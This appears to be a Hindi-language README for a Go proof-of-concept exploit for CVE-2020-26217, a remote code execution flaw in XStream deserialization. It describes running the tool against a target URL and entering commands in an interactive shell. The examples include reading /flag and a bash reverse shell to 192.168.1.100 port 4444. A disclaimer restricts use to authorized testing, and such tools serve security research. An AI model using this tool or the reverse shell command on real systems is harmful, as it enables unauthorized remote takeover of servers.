
CVE-2020-26217 XStream डिसीरियलाइज़ेशन का पीओसी
XStream रिमोट कोड एक्सीक्यूशन शोषण उपकरण।
CVE-2020-26217 XStream लाइब्रेरी में एक डी-सीरियलाइज़ेशन भेद्यता है, जिसके माध्यम से हमलावर दुर्भावनापूर्ण XML डेटा बनाकर रिमोट कोड एक्सीक्यूशन को ट्रिगर कर सकते हैं।
प्रभावित संस्करण: XStream <= 1.4.13
go run poc.go <लक्ष्य URL>
# उपकरण चलाएं
go run poc.go http://target.com:8080/?data
# इंटरैक्टिव मोड में प्रवेश करने के बाद कमांड दर्ज करें
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
यह उपकरण केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए है, कृपया इसका उपयोग अवैध उद्देश्यों के लिए न करें। उपयोगकर्ता संबंधित कानूनी जिम्मेदारी स्वयं वहन करेगा।